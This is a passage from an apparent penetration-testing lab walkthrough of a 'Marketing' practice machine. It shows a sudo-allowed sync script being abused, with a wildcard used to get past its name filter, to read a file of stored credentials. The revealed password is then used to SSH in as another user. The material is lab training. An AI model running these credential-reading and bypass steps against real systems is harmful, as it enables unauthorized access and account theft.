m.sander
After gaining lateral movement to the t.miller user, sudo privileges were checked, revealing the ability to execute /usr/bin/sync.sh as the m.sander user. The /usr/bin/sync.sh script compares an input file to the /home/m.sander/personal/notes.txt file and, if differences exist, updates the file, allowing potential file read and copy operations.
The t.miller user is part of the mlocate group, granting access to /var/lib/mlocate/mlocate.db, which contains indexed file paths. Searching the database revealed a creds-for-2022.txt file in m.sander’s personal directory, which could be accessed using the /usr/bin/sync.sh script.
Forbidden
t.miller@marketing:/var/tmp$ sudo -u m.sander /usr/bin/sync.sh /home/m.sander/personal/creds-for-2022.txt
error: forbiddenInitial attempt failed with the forbidden error
Workaround
/Practice/Marketing/5-Privilege_Escalation/attachments/{A62E5A6E-3F12-4432-99AB-D3CD1B72AABD}.png)
It occurred due to the if statement above that the $note variable should not contains the word, m.sander
This is pretty easy to workaround. I can use the wildcard character; *
Reveal
t.miller@marketing:/var/tmp$ sudo -u m.sander /usr/bin/sync.sh /home/m*/personal/creds-for-2022.txt
Difference: 1c1,8
< supersecret
---
> slack account:
> michael_sander@gmail.com - pa$$word@123$$4!!
>
> github:
> michael_sander@gmail.com - EzPwz2022_dev1$$23!!
>
> gmail:
> michael_sander@gmail.com - EzPwz2022_12345678#!
\ No newline at end of file
[+] Updated.The content of the creds-for-2022.txt file has been revealed and there are 3 credential for the m.sander user;
pa$$word@123$$4!!EzPwz2022_dev1$$23!!EzPwz2022_12345678#!
SSH
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/marketing/Limesurvey-RCE]
└─$ sshpass -p 'EzPwz2022_12345678#!' ssh m.sander@$IP
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 01 Apr 2025 05:13:25 PM UTC
System load: 0.02 Processes: 235
Usage of /: 69.9% of 9.75GB Users logged in: 1
Memory usage: 32% IPv4 address for ens160: 192.168.211.225
Swap usage: 0%
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
m.sander@marketing:~$ whoami
m.sander
m.sander@marketing:~$ hostname
marketing
m.sander@marketing:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:48:1b brd ff:ff:ff:ff:ff:ff
inet 192.168.211.225/24 brd 192.168.211.255 scope global ens160
valid_lft forever preferred_lft foreverThe password was EzPwz2022_12345678#!
Lateral Movement made to the m.sander user